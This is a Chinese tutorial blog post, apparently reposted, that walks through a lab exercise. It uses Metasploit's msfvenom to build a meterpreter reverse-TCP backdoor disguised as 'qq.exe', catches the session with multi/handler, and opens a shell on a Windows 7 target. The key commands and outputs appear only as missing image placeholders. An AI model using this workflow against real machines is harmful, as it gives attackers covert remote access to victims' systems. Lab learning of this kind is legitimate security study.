msf生成后门拿shell

Posted -zhong

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了msf生成后门拿shell相关的知识,希望对你有一定的参考价值。

 

0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧

kali 172.18.5.118

靶机  172.18.5.240

先尝试能不能ping通

技术图片

好的可以 那我们进行下一步

0X01爱之初体验

先在kali终端输入msfvenom -l,打开payload目录

技术图片

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门qq.exe

技术图片

 

 然后将生成的qq.exe移到靶机然后打开msfconsole

 使用该攻击模块监听 use exploit/multi/handler

然后设置payload

技术图片

 

 

 在show options 发现还有未设置的

技术图片

设置LHOSTkali地址

技术图片

然后run开始监听

技术图片

 

 

这时我们打开靶机qq.exe文件就能看到Kali这边获取到一个Session

技术图片

输入jobs退出继续输入sessions -l查看session列表

技术图片

这里有一个session列表,sessionid1

我们输入sessions -i 1,与该session交互

技术图片

输入getuid查看用户信息

技术图片

输入systinfo获取系统信息

技术图片

输入shell即可获取win7shell

技术图片

不过用这样方式拿的shell普遍都是很低的,还需提权

 

以上是关于msf生成后门拿shell的主要内容,如果未能解决你的问题,请参考以下文章

Exp2 后门原理与实践 20155113徐步桥

MSF后门生成模块 面试考题

2020-3-15 20175110王礼博 Exp2后门原理与实践

2018-2019-2 网络对抗技术 20165220 Exp2 后门原理与实践

msf建立php反弹shell

免杀后门之MSF&Veil-Evasion的完美结合